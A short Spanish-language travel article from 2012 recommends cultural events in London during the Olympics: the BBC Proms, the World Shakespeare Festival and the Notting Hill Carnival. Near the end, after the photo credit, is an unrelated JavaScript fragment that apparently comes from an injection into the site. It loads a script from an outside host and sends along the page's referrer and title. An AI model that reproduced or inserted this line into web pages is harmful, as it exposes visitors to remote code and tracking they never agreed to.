Londres y sus juegos culturales

30/07/2012

Londres, una vez más, se ha convertido, en estos momentos en la capital del mundo. Hasta ella llegan miles de personas para participar o contemplar los Juegos Olímpicos. Es una ocasión ideal para redescubrir esta urbe siempre fascinante donde la energía nunca entra en punto muerto. Y da igual si no le gusta el deporte, porque hay actividades para alimentar las ansias artísticas. A continuación destacamos algunos de los eventos culturales más relevantes del verano londinense de 2012.

BBC Proms. Desde Daniel Barenboim hasta la Filarmónica de Viena pasando por sintonías de dibujos animados. La música clásica puede con todo. Aproveche la oportunidad de escuchar instrumentos como el piano o el violonchelo en entornos únicos como el Royal Albert Hall o jardines emblemáticos. Precios populares. Desde el 13 de julio hasta el 8 de septiembre.

World Shakespeare Festival. Uno de los escritores más famosos a nivel mundial, William Shakespeare, estaría contento con el homenaje que hasta noviembre le rinden en Londres. Diferentes escenarios de la ciudad acogerán obras suyas, como El Rey Lear, Macbeth o Romeo y Julieta. Una gran oportunidad para comprobar cómo la condición humana no cambia con los siglos.

Carnaval de Notting Hill. Explosión de color y de ritmos caribeños los días 26 y 27 de agosto en las encantadoras calles de este barrio, que ya es una visita obligada para cualquier turista. Y de paso, comprar ropa y discos de segunda mano y probar todas las gastronomías del mundo.

Foto | Loco Steve

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;

ARTÍCULOS RELACIONADOS
COMPARTE ESTE ARTÍCULO